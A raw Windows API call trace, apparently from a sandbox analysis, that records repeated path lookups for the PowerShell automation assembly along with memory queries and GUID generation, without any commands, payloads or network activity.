	[0062.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.705] GetLastError () returned 0x0
	[0062.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.705] GetLastError () returned 0x0
	[0062.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.705] GetLastError () returned 0x0
	[0062.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.705] GetLastError () returned 0x0
	[0062.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.705] GetLastError () returned 0x0
	[0062.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.705] GetLastError () returned 0x0
	[0062.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.705] GetLastError () returned 0x0
	[0062.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.706] GetLastError () returned 0x0
	[0062.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.706] GetLastError () returned 0x0
	[0062.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.706] GetLastError () returned 0x0
	[0062.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.706] GetLastError () returned 0x0
	[0062.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.706] GetLastError () returned 0x0
	[0062.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.706] GetLastError () returned 0x0
	[0062.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.706] GetLastError () returned 0x0
	[0062.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.706] GetLastError () returned 0x0
	[0062.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.706] GetLastError () returned 0x0
	[0062.706] VirtualQuery (in: lpAddress=0xad024, lpBuffer=0xae024, dwLength=0x1c | out: lpBuffer=0xae024*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.706] VirtualQuery (in: lpAddress=0xad060, lpBuffer=0xae060, dwLength=0x1c | out: lpBuffer=0xae060*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.707] GetLastError () returned 0x0
	[0062.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaddc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.707] GetLastError () returned 0x0
	[0062.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaddc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.707] GetLastError () returned 0x0
	[0062.707] VirtualQuery (in: lpAddress=0xad12c, lpBuffer=0xae12c, dwLength=0x1c | out: lpBuffer=0xae12c*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.708] GetLastError () returned 0x0
	[0062.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaddc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.708] GetLastError () returned 0x0
	[0062.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaddc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.708] GetLastError () returned 0x0
	[0062.708] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x7469d264, Data2=0x6753, Data3=0x4b59, Data4=([0]=0xb8, [1]=0x4, [2]=0xc, [3]=0x6, [4]=0x17, [5]=0x68, [6]=0xcc, [7]=0x4))) returned 0x0
	[0062.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.708] GetLastError () returned 0x0
	[0062.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.708] GetLastError () returned 0x0
	[0062.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.708] GetLastError () returned 0x0
	[0062.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.708] GetLastError () returned 0x0
	[0062.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.708] GetLastError () returned 0x0
	[0062.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.708] GetLastError () returned 0x0
	[0062.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.708] GetLastError () returned 0x0
	[0062.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.709] GetLastError () returned 0x0
	[0062.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.709] GetLastError () returned 0x0
	[0062.709] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x725486aa, Data2=0xeead, Data3=0x45f5, Data4=([0]=0x8c, [1]=0xa9, [2]=0x8c, [3]=0x1, [4]=0x1a, [5]=0x5a, [6]=0x31, [7]=0x1b))) returned 0x0
	[0062.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.709] GetLastError () returned 0x0
	[0062.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.709] GetLastError () returned 0x0
	[0062.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.709] GetLastError () returned 0x0
	[0062.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.709] GetLastError () returned 0x0
	[0062.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.709] GetLastError () returned 0x0
	[0062.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.709] GetLastError () returned 0x0
	[0062.710] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xef04fbc2, Data2=0xade1, Data3=0x4ccd, Data4=([0]=0xbb, [1]=0x58, [2]=0x6, [3]=0xdd, [4]=0x6e, [5]=0x6, [6]=0xad, [7]=0xf0))) returned 0x0
	[0062.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.710] GetLastError () returned 0x0
	[0062.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.710] GetLastError () returned 0x0
	[0062.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.710] GetLastError () returned 0x0
	[0062.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.710] GetLastError () returned 0x0
	[0062.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.710] GetLastError () returned 0x0
	[0062.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.710] GetLastError () returned 0x0
	[0062.710] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x6e757f3d, Data2=0xa7f, Data3=0x48ec, Data4=([0]=0xba, [1]=0x63, [2]=0xd1, [3]=0xae, [4]=0x84, [5]=0x52, [6]=0xe7, [7]=0xee))) returned 0x0
	[0062.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.711] GetLastError () returned 0x0
	[0062.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.711] GetLastError () returned 0x0
	[0062.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.711] GetLastError () returned 0x0
	[0062.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.711] GetLastError () returned 0x0
	[0062.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.711] GetLastError () returned 0x0
	[0062.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.711] GetLastError () returned 0x0
	[0062.711] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xdca21da3, Data2=0xba4e, Data3=0x4a46, Data4=([0]=0xb1, [1]=0xcf, [2]=0xb4, [3]=0x63, [4]=0xe3, [5]=0xa4, [6]=0xb0, [7]=0xfb))) returned 0x0
	[0062.711] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x33ade3c2, Data2=0xed24, Data3=0x4771, Data4=([0]=0x98, [1]=0x4f, [2]=0x84, [3]=0x40, [4]=0xa4, [5]=0x66, [6]=0x3e, [7]=0x93))) returned 0x0
	[0062.711] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x54d9ce90, Data2=0x48e1, Data3=0x4e96, Data4=([0]=0x8e, [1]=0x16, [2]=0x80, [3]=0xee, [4]=0x93, [5]=0x97, [6]=0xb5, [7]=0xb4))) returned 0x0
	[0062.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.712] GetLastError () returned 0x0
	[0062.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.712] GetLastError () returned 0x0
	[0062.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.712] GetLastError () returned 0x0
	[0062.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.712] GetLastError () returned 0x0
	[0062.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.712] GetLastError () returned 0x0
	[0062.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.712] GetLastError () returned 0x0
	[0062.712] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xc9b14f8f, Data2=0x1020, Data3=0x461d, Data4=([0]=0x8e, [1]=0xfc, [2]=0xdf, [3]=0xd8, [4]=0x39, [5]=0x3d, [6]=0xc0, [7]=0x27))) returned 0x0
